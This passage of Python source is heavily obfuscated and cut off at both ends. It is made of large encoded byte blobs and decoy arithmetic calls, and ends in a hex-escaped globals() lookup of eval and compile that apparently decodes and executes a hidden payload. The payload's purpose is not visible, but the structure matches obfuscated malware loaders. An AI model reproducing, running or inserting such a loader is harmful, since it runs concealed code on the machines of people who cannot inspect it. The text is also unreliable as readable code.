\xd1\x8c\xc1\x98\xa0\x8b\xea\xbbi\xd0\xc7mu\xf3\xe6\xa6.hM\xef`\xfa^\x84\xfc\xb6}k\x82K\x1d\xc5L\xf5\x08)\xd7\xa4u\x18\x83\xb6\x07\x84\xee\xf4\n:D(/\x88\x07\x89\\\xf7t\xb6b\xd1\xb6\x08\xf8P\xf8=3\xe5\xab\xc9\xe2\xee\xaa{\x18\x9b\xf3\xb3\x98\xc1\xb7Rs\x8a}w\xc6\x81\xf0B\xde)N\xd2\x9f\xc4[\xc9\xf2\x9e\x08\xa1\x9fP\x85{\x9e\x99\xe7\xa3\x93Q\x8f\x97\xa4\x0e?\x00\x08f\xab\xda)\x91\xb7>\xfe6E\x928\xbb\xf8\x0bs\xcc\xda\x89l\xcb\x86g\x89c\xdb\x1f\x02\xef\xb9\xe3\xc9br$\'A|\xcb\x8aDa\xb8\x08\xc5\x81\xaab\x17"q\x1b\xc2w9 >Q\x1c\xd8\xc6\x92\xd71\x96E\xf6Oc\xaa\xbc\xad\xae\x00A\x8a\x85\xbc>\x13\x82\x17\x07\x03=\xcb\xef\x05\xfe\x08?f\xf29\xb1\x95\x91\x13Q{\x9c\xc6"S\xfa\x92T\x8d\xcagX\xcdW\xcfHu\x85\xe5\xc4W4\xb3\xeac*\x03\x99\x0c\xb9\x8e\xd2\xbc\xe3LSX\x1cx\xc53B\xae\x18\xc1W\xca2\xc1\xa3Wq\xb3\x90v\x80\x83\x8e\\\xa8\x7f\x06\'?BQ\xde\xa4Xl\xac\x0bp\xb5\xa2\n\xeaa0\xaf\xdf.\xa6\xf3U}\x18Ea}\xf8m\x15,\xeb\xb8\xbb\xfav\x1b\xd4\xdf<\x8c\x82\xdb\xd54\x9a\xd7\xa3\xdb`~\x84\xc7W%Q\x8c\x0e\x18\xa0.6\x8af\xb3h\xdeX\x04>\\s\x16\xc85?\xf8\xab\xe0\xd7 \xb8\r\x16\xf5e\xb0\x1a\x8c\xa2E0\xf0\'\x93\xe9|\xba\xfaF%r\xc0\x00n#Z@i\xe2t\xb7\xfe\xc2\x9f\xe9\x06\xbc\xa7\xbdD\x85\xa1\xbf\x0c\xc6\xd3\x85\xae\xf1\xe6\xc3\xe5\xd9\xe5\xc7\xfaO\xaf/\xdf\x9c\x9e}\xe0\xaac\xb8\x07\xf3\x9ed\xbf\x8e\x1f\xe3 \\\xf9G\xea\x97\x9b\xfb\x95\xde\\Fs>|\xf9m\xb9\nf\x8dk\x7f1\xbe\xf7\x17\xfa,\xbf\xbc\xfep\xfa\xe9\xf5\x877\xf5\xf7?\xd7?\x9e\xfd|\xa6n+\xc0\x06I\x9d\x91\xbf\x90\xf3EK\xd9\xc2[vm\xae~\xb7\x80\x916\x94\xea\x8b\xe0\x7f\xee\x82\xe5\xaa\x0e\xad^\x06\xf5`\xb1\x88\xf4\xe1|\xde\xc6,X.\xfd\xaf\xd3\xf9\xd7\x8a\xbf\xac\xe8\x1d\xa9\xb4\xba\x86Jc\xa3`\x1a\xc9\xd6\xf2nx\xbb\x88Fp\x04_\x18\x9e/\x9eE\xfd\xfan\nW\xed\xd3\xa3\xf6\xc3\xa3\xd3\xf7\x83_\xfa\x97\x1f{\xe14\xbc\xc1\xf7\r|\xc2\x8c\x80\x1d\xdc\x0c\xa1u\x93\xca\xfb\x9f+A\xb8\x0c*ZC+\xeaZ\x1c\x91G\xfd\x8fg\x97\x97o>\xfck\xf0\xfa\xfd\xd9\xe0_\xf8L\xfa\x17\xbd\xfb\xfb8V\x8a\xcahqt\xfa\xe6_g?\xbf\x19\xfc\xf3\xc3\xbb\x9e\xba\xea+#Y\x89\x11\x83r>\x7f\xb5\xee\xa4\xaf$\x84\x97\xa8\xb4\xce\xe8\xf6\xd5i\xcfN{\xe2\xe8\xc7\x81\xec\xc9\xdd\x0f\xb6\x8e\xce_\xbf\xff\xa9\xffy\xf0\xb1\xff\x8f7\x17\x83\xf7\xaf?\xbc>\xefQd\xd4H\xc5Ge\xc8+\xfc\xe3\xd9\xde\xbf\xfe\xf8\xf3/\x83\xf3\xd7\x1f\xfe\xf1\xe6\xc3\xe0\xa77\x7f?\xbb@\xab\xab\x0e\xc4H\x93\x15\x8d\xf4\xfdL\xe57\x17\xa7=\x1d\xda\xf7\xf3g\x9d\x0f\x11\xbe\xb1\xee\xe5\xc7') + + Math(StackOverflow = -74088 + -53820)._detectvar(Positive = Modulo._positive * 97057) ;Math.Cube(_hypothesis='XWXXXXWXXXXXXXWWWWWX',_invert=b'\xfe\xcf\xffPg|H\xc4\x8f\x91\xb0\xafq-<\xd5\xbd\xa4\x00yP\xe9@\x8e~y\xf3\xfa\x14z\xa2\xf7\xfbQ\xa5r\xa1"\xf4s\xd0B\xe5\xe4x~q\xb2\x07\xddr]\xe2\x02l\xc2M\x93\xba\r\xd6\xcd\xb17\xb41\x95i\x17\xf5\x06\xb6\xe3X\x0e\x90`Js\nB\xb9\xe3RI\x1b\x16\xb6\x89\x1dx\xe3\x1c|C\x1d\xeeY\xda\xf2p\xaf\xdb\xcd\x8d?\xe1d\xdfM\x8e*AnG\xf5\xa3?\x8eN\xffy~\xfe\xdf\x83\xbf\x9d\xbd{s\xd9\xfb\x02\xe4\xb0\x19\xd1\xefM\x8a@\x115\xeb\xa1d\xf7\x10\xf5\xa6Rr\xd6\x99\xb4\xe3h\x9e\xde\xe06\xbc\x91\xbe_\x1d\xc1X\xf9\xe9\x9f\x7f\xef)o\xd0\x0b\xf9>g!\xec\xfch\x1cL*\x83q0\xbc\xfbZ\x9d-\xbf\xd6N\xe0\xa6a\xf8\xf3Q\xb8S\xa9\x10\xfd\xa4\x1f\xa9\xf2\xe2n>\x18\xcd\xc6Ux\x9f\xe0\xbc\xfa\xb2\\-\xaej?\xfe\x1f\xf8\xc2\xfa\x8b`u\xb7\x98\x1b\xf3\xb11\xba\x0eF\xbf\x0e\xa2\xbb\xd5\xed\xdd\n\x8f\xaa\x07s\xe86\x98\x9d=jvSe:o\x92\xf3\x1563\x8aj\r8\xdb\xf4\xb6\x9a\xb8"\xdc\xe5\xc4\xbf\x0bW\xc9+\xd7U\xe9\x89Lo*\xed]D\xf3\x00n*Q\x88\xb7\xb7Z|\xe3V\xa9\xfb4ZS\x83\xf2\x80V\x04\xf3\xee\x7f\xf6\xc30\x18\xbf\xe7\xbd7H\xb2\x12\xc7\xab\xab\xd3}~\x05r\x0f$\x1e(Vu\xcf\x9b\n\xa3\x91\x1f\x0e\x86\x0bX\xbb\xae{rk_\xe2\xf8K4;$\x8eM]\xe5\xac\x88?\xce\xcf\xeb*\x0f\xa1ZR9\x8ej\xff\xb4\xaeh\x04\xe7\xba8\xe7?\xd8\xb8\xaa\xd1eW\x0b\x7f\xf4+<\x10X\xacf\xd1*\x88\xaf|\xa6CW\x84J\x91^\x8f0A=a\xe4\xc9pLq\x19\xa2\xa8~3\xc5?\x18q0\xeaB\x1cy8\x0c\x91\xa0\xbe2\xdb\xf4\n\x9fs\x93\xd3\xdbG*\xdb}\xbf\xa9\xee"\xf5D\xbe0]d?\xd4\xd8)u6\xaf+\x05\x82\x0eb\x8aM\xaa\x7fJD\x19W\xff\xafR-{%)\xa3f\xf1)\xe7\xf3\xab\xdcO\xfe?*\x17\x11,u\xf3\x8a_\xe1\x06\xd5\'Pi\x08\xd7X\xd3\x02=^\xbfP\xdc\x98\x88\x86:\xceu\xf62\xac+RI7\xad\xfc\x94\xd4\xfcV=\xce\x9b\xf5\xb7D\xdc\x80\x88\x01\xf5"\x01\x1d\xa8\x9a\x1e\xf6=\xf5\xcd3\xe5\xd6_\x8d\xae\x073\xffv\x18=\x0cV\xd1\xaf\xc1\xbc\xca3Z\xd6\xdfx\x1b\xd6\xebJe9\x82Y\xb6\x1a\xc0a\xd7\xbdh\xd9\xc0\xef\xc6M\x04\xe3W\xf1\x17u\xc12j`#\xbb?]Z\xd8e\xe6uhl3\xed\x90\x13M\x97\x93i\x18T\x955F\x91-\xad\x8d|\x95]\xa2j<\t\xee\xa7\xab\xeb\n2d\xd5>\xc2\xecx\xcdB\xa4\x18F\xffP=\xb9\xe6\xe8\xba\x82\xe4\x11\x96\xa1\xcf1{\xfa5`#&|\xda\xd4\xfdN\x90\x95\x1bWcJC\xf7\x0e\xeci\xa2\x9a9\xd7\x8f\xcc[3z\xae\xde\xe7GK\x8e\xa3jP\x13\xc9\x8e\xe8\xea\xd0\x07|\x16u\xc8(\x9a\xaf\x82\xf9j\xd9\xc3_\xd4M\xf0\xc5\x93+fe:O\x1fR\xf1\xe7\xe3\x8a\xb9b\xae\xa9\x93\xbac\xd5\xa6E\xd0X\x06\xfebt]e\xf5\xce[Z\x0ci@\xd5S\'@\x94T\xa2\x0f*\xd3%\x9d\x03\x9f0\x9f\xfd\xee\x16Y\xccq\xdc\x94\xfd\x96`\xcf\x1b\xc2\xe2\xdbFa\x1c\xb329\x13VO\x90WO\x80@&o\xec\x8c`kh\xdbN\x13\x96\xe0&,\xc6\xb6\xdd\xb6;\xb0,c\xfeq\x0bs\x8e\xc3\xa2<\xb1-\xdb\xb1=X\x9a\x03>\x82\xd5\x94(\xe6c\xa2\xeeM\xb9\xca\xdb\xb0\x88{\xc3M\xe9Bp\x89\xcfyu8\x97m\xe7\xcb$\x95\x1c\xdf\x89A\xd4g\x9d\n\x03"\x99\xb4b\xa8\xc5\xe4\x18\xaa\xd0v\xe3\x1e\x04\x89\xa0\x9a~\x0c|z\xb5\x98\xf7\x15\x99e\x9aCs\x03\xa9\x0e\xd3\x89\xbb\xf9\x0eJ\x91\x8f:\xcccFV"\xa3!m\xadm\x9c)\\S\x85\x15\x10q\xee\xd1\x93$\xcb\xafn\x99+i~u\xe3\x94\x19\x06\xb0p\x0f\xa6\xf3q\xf0\xd0KUh\x80<7\xae\xae\xbd2\xf7y0\x1f?\xe6H\xb8\x8d\xda+\x10M\xd7\xfe\xb0~\x86\xa5\xce\xfb\xe5\xc4\xb8\xdd\xabW\xe9_\xf5\xfd\x9c\\m\x19r\xac\xc3C$\x18\xc1\xbf8\xb4g\x81!w!\xe9\xb4\xceM\x1e\xf3\xbcv4\n\xfd\xe5\xb2\xd2_M\x97\xafo\xa7xVb:\x07($\x0f\x06\xd5e\x10N\x14\xe9\xc7\xcd\xc6\x80\x85\xe2\x1eK\xc3\xd5\x9a\xf1\xcb2XL\xfd\xb0\'\xa2i\x039..\xab&\xeedO\x91\xc0\x19\xa6\x85\x02gl5\x95=\xbeKaT\xd1\x9c\xa9\xe8\x13l\xa1"\x15$\x03\xcc0G\xb4\xccqGp\x9e\x00}\xa9\xe3cr\t\x0bf+\'\xd0\xee\xa0\x17\x1bIb\x0e\xef\xfc\xdc\xa8\x06\x9cGt?X~\x9b\x8fzzU\r\x15\x84\xcd\xa86\x0e~\x9b\x8e\x82\xc1t,Kt\xea\x879\\\x0c:q\xbe\xeaqg!\x8f\xc1\xbd\x82\xe6\x00\xa3\xfe\x1d\xf44VN\x9fG\xca\x07\xb7\x8b\xe0\xb7\xf4\x8f <\xfc\x06#f\xf0k\xf0\xad\xc7%\xf8\xcc\x8c\xd2\xc4\xf3\x9d.\x07\xd1\x04\xe4w\x7f\xdc\x8b\xf9\x85P\xa3I\xd7\xd6\xe4\xcb\xb2\x93\x95\xf0SJ\x0e5G\xce\xac\xa7\xd5\t\x8d\xcb\xbb\xe1\xb9\xbf\\\x05\x0b\xe0\xad%"\xe4\xbdl\xdd_\x99w\x04#w5P\xa3>\xdd6\xf3\xb7\xb5\x8d\xa7\n\xc1o\xd8\xb7\x1b\x7fY{ \xb7.\x9c\xce\x83^\x9cMN\xb9\xb0K\xb69\xf3l\xc4bOo{\xc8~#\xf3\x8d\x92 0\xdf\xa8\xd2\x80\xbf\xa9\xd9\x0fs\xffvy\x1d\xad\x06\xacK\xc9\x8e\x89\xe5j:\xf7Q>I\xd5\xa0e\x83\xda\x9a\x9d\xb0\xa8\xe7\xfa\xcd\x87i8\x0c\x83\xe4\x84\xa5\xa1\xfc\xaaG,d\x9c%\x11\xb7\x84\n$\x8f5N\r\xb4\xde8G\xe5?+\x97\xc2\x8a*\x07r\xe5uS\xf9K\xef^e\x90\x89\xc5#!]\x99\x99\x82\x9d\x03\xc2q\x88\xf2\n~\x80\xa8,WC\x1e\xe7\xfd\xcfrd\xe6\xf2"w\x87zL\x86\xbd^\xc4:\x12Z\xad\xd5\x9a-\'0;G\x1e\x90\xea\x9b5gG\x12L\xab>\xeaf\x90\x87\xed\xf5\x94\xc4\xa7\xd5\x06\xf0\x9d>\xb71_L\xd2It\x11\x15\x9e\xd5\x04\x08[\xcd\xa3\xda\xfa\xeeU4F\x82G\xe1v\xafG}\xc5b\x1dIs\xa1\xea6Z]S\xf4\x05\xf9\xc4\x98G\x94[\\\xc0:ESm\xc3e\x89_n\x12\xdb\x8e\xaa\x0edS\xa2^\xefR\x89\x19\xda\xa7\xea\xd22.)\x14g\xfd\x15\xb1\xc3\xa5\xc6\xc6\xab\xaa\x80\x82\xact \x01\xa3\xd7\xc3\xd5\xe0-\xf6\x11\xae\x16oQ\xcc\x02\x1a\xf8nSS\x85%\xdep_I\x8ey\xcdH\x9c\x9b\x00P\xd1\t\x9a\xb3B\x0f\x1asR(mg4\xfa5X\xf1<\xeb\xf1N\x83\xbf\xaaj\xef\xf5\xdf\x06g\x17o>\xd6\xd5\xee%\n\x0c\xa7\x7fG!KI\xfc\xdf\xf4\x8d5`1\x9f\x07\xa3U\xb5\x1a\x91\xe8t\xaa\xc63i\xfeH{0W\x7f:\xf6-\xbdkz0\xdf\xf6h\xc8\xe1\xb5\xb8\xd3\xbf0\x97\x17g\xbd\xa6#\x98\x17aA\xfb$>\xf6\xc1\x081-\xd0J\xdc?b\xdec\x0e}f\xdel\x18-\xe5\xb1\xc6l\x8d\xe8Ge\x9c\xab\x05\x11\xa4\xe7\x07\xd1\xe6?\xc8\\J\xc8\x84\x13\xc5\xd8Lokk\t\xea\xad<\x11\x9cR\tv9I\xaaRB\xef\x9e\x0c\xc86\xb0\x18\x08"\x1b\x04\x19%\x9cXv\xcb\x1e\xe7c6\xa4\xf5q\x07~\xdf7\\\x97\xf17\x17\xa59\x0e\xae\xc4\x83\xd4\xda\x975\x82\xbd\x9eRz\x02\x9bO\xafp\'xCh\x8e\xd2\x0ec\x16gh\xd2D\xc4F\x1b\xbe\xa0W\xba6j\x94\'\xf0m\xe7{Bf\xd3\xd2|\xdc$\x16\x88\xca\xe1x\xd7\xb8\xc7\xe6\xe4{\xb3G\xe6\xe6~\xe9!]\xfb\xcb\xf5\x0fI=\xdc\xc3L\xb32\x1e\x98I\'\x0c\xce:E&b\xfeB5H\xf1\x9e\xeaC\xc7\xa2J\x13\xe9\xd1mo\xe4/\x1a?\xfb\x0b\x96\x8a\x1ah\xe4\x1a\x909\xb3\x9a^\xf9\xab\xa4!|\xcb}\x80\xffg\x9aR\x1b7\xd6\x1b\xdd6\xe0\x94\x7f\x03~8X\x90\x8a\xdf\xa0\xce\x15m\x19=Ys\xa4\xe6\x19\xb5\x0e\\\xfff\xf6\xc2\xed\xdd0\x9c\x8e\x88\xc7/\x83V\xae{\x88\xa4@BX+\x92#\x18|\x0e\xaa\x80\xda\xb0\x17xM\x0c\x7f\xfe\xa4\xb4\xb1\xac\x1b\xdcJ\xf5\xcc\xe7\xf2I\xc5\xbf\xd2_\xac\x1fO<#C\x10{\xf6\x87\xf4\xdd>\x9cC>\x14C\x9cJr\xaaF\xf7\x1b\x13?A32\x92\xb8XFf\xb24\xaa\xad\xd4\x8d\x1c\xad=8C7\x12\xb9\rH\x93\x17\x9b\xea.$[\xdc\xb9Fo\xc2GF\x9c\xd1\'\xef\x89zO\xaf\xdc\xc4\x05nl\x89\xa6)\x9b\x08\xd0\xfa\xfa\xd4\x8d\xc4\xc1\xa5\x96\x8d\xba\xde\x8d\x874\xa2\x18\xe4t0\xbc\x19\xf7\xb0\xf7\x00jS\x9c\x98\t\xea\x87<\xc7jZc\xb7\r\x9f^\\N\tY9\x82-\xfe\x8a51^\xd7H\'k\x95\xdf\x08*OC\x8d\xc2xYy\xa0y\xdc\xf3E[\x81\xa9\x83,r\x01\xc6\x08 M ?\x98%\xc9\xc2U}\xedJ\xdel\x07\xf8\xdb#W\xcf\xddz\xf1\xdaw\xf4\x88\xe0\xf3p\x8fH\x13Z\x11\x83\xb3\xc2\x83\xa2\x0b7\xf7\xab\x06\xcd\xb6\xa0\xfa\xbb\xb6\xb9I\xb4<\x8e\x9cw\xa2\x13\xbb\x89\xf1\x1f\xc5\x9e\xba\x91e\xf9\x936%~\xfe|"0\xa0\xc6\xddj4\x8f\xee\xab\xb5W\x1a\x0fT\xbd\x8e\xee\x16\xcb\x9e\xf6`\x13\xb6\xe3\xa1\xf6G=\xa3\xb7\xab\xfb\xe1WD.]\xcfz}6\xd4G*L*\x05\xe3O4\xd3\x1f\xa1\xb1\xd4hd=xX-|\xb6|+8\x81\xff-D\x85\xc5\xef\xea1#h!$\x95U\xc8p\x9c\x10\x01\x0c\xe1t\xba\xb5\x01\xb3\xe9\xfc\x0e\x98\x9f\x1ej#\x10\xcc6e<\xdbT\xa1\xdb\xc2\x1a\xa2)\xd4\xa0\xa2[\x90Q\xa5.\xffE+\x0bc\x85\xe1\xe7OW=\xaa\xcbD\x98\xcc\x84\xc6cQGn\xed \x89\xf6\x14?\x0b=\xb4cTZ\x95N\xcd`4') + + if 422595 > 9167887: + Modulo._detectvar(Positive = Modulo._positive * -85022) + elif 194948 < 4975485: + Modulo._detectvar(Positive = Modulo._positive - -61332) ;Math.Cube(_hypothesis='SS222S2S222S2SS22S222S2',_invert=b'\xbd\xa2\xf1\xe5\xe8S\xc6\x95\xf2\xde\x88\x158\xf4\x91XM\xa8\xbe<\x00E\xf2\x08\x860g\xd5h\xb4\x9c"\x11]\xa3\xb2\x9b5\x946O\x89U\xda\xd8\xce\x92{Jo\xa2\xabC\xc7\xc9@\x93\xe0\x9a\xc2_\\IS\xbe\xde.{r\xd8\x17\xfe=\xb6sC\xdd\xab$\x0b\x0c\xd5\x1b\xa1\xbf\x9a\xae\xee\xc6A\x9dv\xa2\xf9W\xdaK\xaf\x9bu\x93\xeak\xc5\xd2:\x9daR\x8e\xa8%\x17\x91\xa4$XK\xdcMi2\x152\x13\xa9P\x8d\x1d\xabk5\x8dH\xaby\xa9\xbe\xb2\x8f\xc8\x04\x9a\x8a\xb6\x97\xa0l7\xac\xae;1\r&u\xe1\x9aX\x93\x18\x83\x1be\xea\x9f\x18\xaa\xf9\x98k\xaf\xc9q\x1c+\xa0\xaf\x94\x9c\x11[\x8bN\xfb\xc6Q)\xf2\xa6g\x1f6\xa6\x8eP\xc3A4\xbc\x91A\x81\xd6)\x05\x05\xacr[\xea\xb3`u\x1d\x8d{Zw#\xd1#h\xd4\xeb\xb1\x88g\xfb\xaf\x99\xe8\x96f\xa26\x9b\xcdH\x07GaxtP\x1e\x0c\xea\x8c\x05h\xef\x93\x1bH\x0e\x834\xdb \xb5\x88\x17\xd2\xb9[\xc4\xa2\xc2\x08\x18-Im\x1eIA\xa8\xee\xb4\xd7\xbbT\xfan\xa5\xf2\x96\xd8\xb1r\x1bO:\xcc(\x85\x17\x0b\xec\xc4\xe7\xe2o\x8f\x12l\x15,F[\x10\x96\x839\xf4\xd70\x8c\x08`c\xceB-\xc9kc\x83\xae/\xef\x86\x83E\x04\xa4\xbf\xa7\xad\x00\x96\x15+\x8b/\x93\xb3Y=\x07\x9d\xb5\xee\xe1^\x03\x10\x11](7\x9bnZ|\x9f\xca,\xb0\xa35)>\xbb\xa4\xe7J\xbc\t\'\xb2\xc4\x94\x11\xd9,W\x14\xdf\x8c\xa3\xbap@\xc3\xb6;\xa4\xa41\xde\xde\xa4f\x8da$\xc3\xa7\xe1\x9f\t$\x1e\x01\x7f\xbe\xf0\xc7\r\xe9/\xbd!\xda\xeb\x9b\xdb\xe0+\xcf\xbe\xba\xfc\xa4O\x85\xa0\xdb\xec\x89a\x10\x8ca\xbd\r\x8a\x9d\x1b\x1eR/~\xc4\xba\x18\xe5\xdbe\xef\xcb\x95\xd9>\xa8\xbaN\x89/\x03\x06\xb8c\xbcP\xf5\xa1f\xfeBG>l:\x8e.\xd5\x9bF\x8d\x9fp\xdd?\xeb\x1bw\xc0\x7f\xf1\xadW\'\xf5\x87\xf4\xafj@3\xb8\xba\x017\xa0\xb8\x92\t\x92\xab\xdf\xfc\xf0.\xa8\xd6j\x06\xe7\xa0\xd0\xa1\x1aG\x96<_\xba\x9b\x8d+hI\xcc\xec\x8c/\x9f?\x1b\xc1,\x952\xe1jcK\xa9K\x1b\xfe-\x08\xe8\xe3\xea\xef\xb4(\x11\x97\xc6\xac^x"\xfd\x87g\x8e\r?h\x05j6\x05\xec\xda\xbf\xaa\xfdQ\xcb\xde\x08A\x1b\x11\xa5\xc0\xcbP\x9f\xaco\xa7yoE\xe0\t\xb1\xff\xe1\xc5E\xean\xa2\x88=\x12\xc8\x9c\x07\xe7N\xdcF\xba\xdf\x16\xfet\x19\xc4\xc2j\x95\xac&\x0c\x9cf|uD\xb9S\xfbr\x86\xe4\xf1\x02\xcb\x83\xd5+\x9a\xe9\xd2X\xb7\xc1?4F\xd7\x11P\xbf\xaa\x81\r\xae\xd5\x19\x9e\xcd\x1ft\xb9\x94\x06\x82\x1b\xde[3\\X%\xa1\x87\n\xf1\xcc\xc4{\x931\x141\x9c\xb8\x93\x99\x1e\xbfk\x0b\xee\xa5\xb6\xccY\xd6\t\xfe\xfaG\xfd\xf7\x881w\xec\xcc\x11q$e\xb2\xb0q\x85\xab\x98\x98\xd0\xe9\xe2\xfb\x04\x9e\xd2\xef\xe1B\xd0\x18\xdf\xcdn\x97\xd5\xdf\xfb"W\xf0\n\x0e\xc3\x82N\xb1\xfc\xa3&|\xf8\xc5y\x0c\x8c\xd0\x90\xd6\xf8~\xf7ZL\xd8\x07\x85\x9f\x97\xe2o\xc8{\x02~\xec\x9d\xd2#\xe5\xb0\xd0\x8c\x97\xe9\xb3\x8b\x8ap-\x0f\x06x v\x00\xa8S\xd3\xf0\xa3\xf6\xbd\xaf\x0b\x9c\xde3\xef\x9a\x10\x0b\x05I,\xc1\x06\xa3h\xaaVc\xba\x1c\xf8!\xd0\xf2x\xf94\x16\xcf\xf5 \x05\xed\xf7\xd1\xf8H[\xd5\x95\xbf\x00\xaa\xd7K\xaf\xdb\xb5\xcd\xe7h\x80\xe8\xb5X\x99\xd6 c|\x90\xa0\xaa\xb8j\x923d\xc0\xd0N\x8e\x07\x84\x00\xa6\x85kT,\xa4\x1eQ\xcc\xba\xe8 \xf8<\xa9.c\x19F\xbc\x82\x92\xd6\xed\x14\xdb_\xa9(\x1c\xf3L\x0c\xb33\x83!O\x08\xe2\x9a\x1d\xbf[\x84{b5-\xd4\xf0\x98\xba\x1d\xc7q,;\x1f\xb6I\x9a\xa5zu\xdd\x02\t7\xf6j\xdf;C\xed\x13*mqH?\xc2\xe6d\xa8.\xe5\x89\xae_\xba\x8b\xde\x1b\xa9\x9b,b\xcc\'\x14k7\x1f\xe3]\xe2\xf5\x1f\xd1Kf\xf7\xa4\x81\x0f\xe4 \xc5K\\\x9f\x96cq\xe4\xeb\x1f\xa5\xd7:j\x83\x1e\xec\x96\x9e\x00GE\x1b\xd8\xc6\x06R\x98\x06\xa4\x8a\x92\x0e\x88(\x9a\x92r\xacN"\x8cC7\x7f\xe7\x1bjx\xa0\x14=E-\x1a\x1f\x14\xd5\x80\xdb\x8ei|\xfd\x1a\x88L\xb0X\xf6\x94\xc7\x92\x90\x02\xfe\x8a\xa5\x92\xe5\xad>\x0f\x1c\xcf\xab|\xf0?\x9a2\xa8o\xb3~4_\x06=\xdc\x10\xbb\xb6\xbas\x8d\xc3\x98\xc5\x00\xdc\xb9\x1c(\xa2U0Z\xf1\xea\x8a\x9a\xabe\xd5\xf0{\x10\xad|\x8d\xf8*u\x99\x9eV\x0b<\x887\x1bm\xf1\xa36N$G$\xc5a\x03\xb6v\xaf\x17\xc5{si|xH\xcag\xd4. \xcd\xab\xbbe\xdd\xb8g\xd3\x12@n\x82\x8d_>~|O>\x18\xe8\x18\x18\x18\xe2\x19\xc8\x04$\xe3\xc5\xfa\x00\xdd\'icC\x120)\x80\x91P\x03\xbaR\xd5\x8d\xd6\xbc\xa5h\xf8g\x14 \x81|0\x92\xad\xe0{\xa8\x1b\xfd\x83\x00\xa2\xb7\x1cC\xff\x8c\xac\xb04vkk-\x1c\x89\x16e\xeeT\xe3\xdc\xac\xd8\x03\x838\xb0M=\xafU\x90\x9fb\xb5\x9bB\x0b\xea\x1b\xc69\xf6\x8e\xfc\x00\xd8P\xfc6y\xef\xd2\'\x1a4v\x96P\xf2\xf2\xf3R\x96\xa3\x84\xdd\nW\x9b\x81\xd2\x93\xc2J\xa55\xb0H2\xd2\x885i\xb1V\xfdi\xb5_\x92O[\xa7\xce4\x88\xb7\x1cN\x1c\x87>E\xfc\xe8\x93\xf7\xf4E\x13 yY\x98\xf2`\x15\xab\x1b\xd7\x1c\xa3|\x1bch)\xeb\xd8Q]\x9cTUj\xce(ne\xe5/\xbd\xb5\x80\xd5\x84\xda7\xbeT\xa4Tk\xe4~Ia9\x91\xa3\xbe\xca\x9c\xc3`t\xd2H\xd8\xb5U3\x06:}_\t\xf4\xee\x86\xbb\xd23E\x8b\x95\xbcy\x95:\x87qWIP\xf0\x9aj\x89Q\x91\x86"\xe3\xc3\xac\x1a\x85\'\x06v\xd8\x04W\xc0\xfa\x94]\xb1S7\xaf]\x1e5<\x1d\x05\x87\xab^\x12\xb5\xb0\xe6@\x0e\x1aL8\n\xb54\xc1\xfb*\t>W\'Aor=(S\xa7Q8\xba>\xe3C\xd9\xe3\x1d\x1e\xf1U\xcfp\x17L\x92\xd1\x0c0;T\x7ffT\'M\xb0Rl\xa1\xb8h)!\x8d771\x86\xc9[\xd5l\xa2\xa2\x12|\xe6\xb4\xfe\x8f\xed\x00<\xef5\xcd\xd6\xbck\xf57?<\xe9%T\xa9\x82\xe2\xd6\x18=\xad\x92\xa8\xfd\xc5x\xaeY_\x14c\x98\x98\xea\xa7\x17\x03Z\xfb$\xd6%\xc1\xa3\x7fN{V\xe0\x9f\xe1]\x01}g\xb0}k}tL%\x15v\xb5q\xa2\r\xd5\x13\x0f\xcf\xc4woS\xdf\xae\xa9\x1f?\x93\xa7\x91c\xd7\xa7\xbd.E\xc7y\x00m49s\xf7U\x96rRgaRIc\x9d"\xdb\xc5\x83pW\x02\xe8&u4/]\xf0\xb8R\xb3)\xa6\x08\n\xa4\x81\x0e\xd4\xe2a\xafmo\x9f\xeb\x86\xfaD\xce\xf0E{Bh\xff\xd2X\xa4\xf8\x9e\x9f\x1fZ/H`\x19y\xfbZ+\x8c\xd5.\xeb\xce\xb0AI\x91\xad\x98GO\xb1\xc6[b\x97\xaa\xc28\xa4\xb6\xf5L)\x85\x05\xf2\x82)Kg\xbc|\xc6\xec\xe2\x9a[-\xc7%\xca\xc3g\xd6\xde{\xce\xed\x9cq\xf1\xba\x90\xe46k\xf5MsQ\t\\:E\xe3\xa5f\xf3x?iE<\x13\t@\xbc\xad\xc3p\xf34\x84\x83\x08\x19\xcfN\xeb(\xe7r\xd4\x86\xb5\xc6\xc5\xb5\x9eC\x89\x05\xf1B\xc1\xa8\xce\xcd\x98\x0c\xb8e\x90\x0bq\xc68\x97\xcaXi\xe7\xe5\xd8\xd7(q1\xf2\xda\xa0h?\xe1\r\x078I\xcd\x91\x8c\x17\x93\xe8\x9d* le\xabh\xc61s\\Q\xdb^\x9aX^\x1a^>q\xdaH+\x07\xb5Lq*\xba\xe2\xd1\xfa\xa7c\xf2\xa8f\xf9\x9a~\x8a]\xb66\xf4\x12UH\xf6Q|LR\xc8\xdb\xb9&\xd7\xd6V\xdf`\x7f\xcd4\xce\xf0.K\x97>\x15]\xd8\xdf\xe6\x8c$/ZM\x97 1\xfc\xa6\x08"\xd3\xe1L\x90\xa5\xea\x97H9N\xab\x18\x01Q\xbfN\x1e|k\x83/\x89\x06d\x16G\xf3!M\x08\x1e\x80\xd7\xeb)\'U\xea\xce\xc5\xaf\xbd8\xbcS5^N\x15\x90Ea\x86>q\x80)\xe8\xce\xd0\xffF\xf7\nO\'d\xd5p\xed?*\xff\x80\xa3\x97\x95\x05\x9c\xa7\xe2\xaf*\xad_\xfe\x17N|\x7f\r<_%\x16\xce\xd5\xc9\x08Q\xc3c\x04\xefE\x00:\xb5\xb8\x84V\x01\x05\x00\xfa\xb5\x8176\xc0\xe6\xa98)8\xaf\xaa\x12\xc1%\xb6\xd0n\xe0\x0b3\xdd{\x84q_X\xea\x18\xf4z\xa1\xf8\x93j\x1c\x06m\xe1)\xf9:G\xff\x0f\xd6\xf5\xe3B') + + Math(StackOverflow = -26097 - -81797)._detectvar(Positive = Modulo._positive / -65919) ;MMNNMNNNNMMMMNNMNNMMMNMMM,wwwxwwwwxxxxxwxwwxwwww,oDDOODooDODDOoDDDDoO,MNNNMMMNNMMNMNNMNMMN,oDODDDooOODOOOOODDODoD=(lambda DDODOooDoOoODODoDDOoOoOD:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(DDODOooDoOoODODoDDOoOoOD)"),filename='\x49\x49\x6c\x6c\x49\x6c\x49\x49\x49\x6c\x6c\x6c\x49\x6c\x6c\x6c\x6c',mode='\x65\x76\x61\x6c'))),(lambda 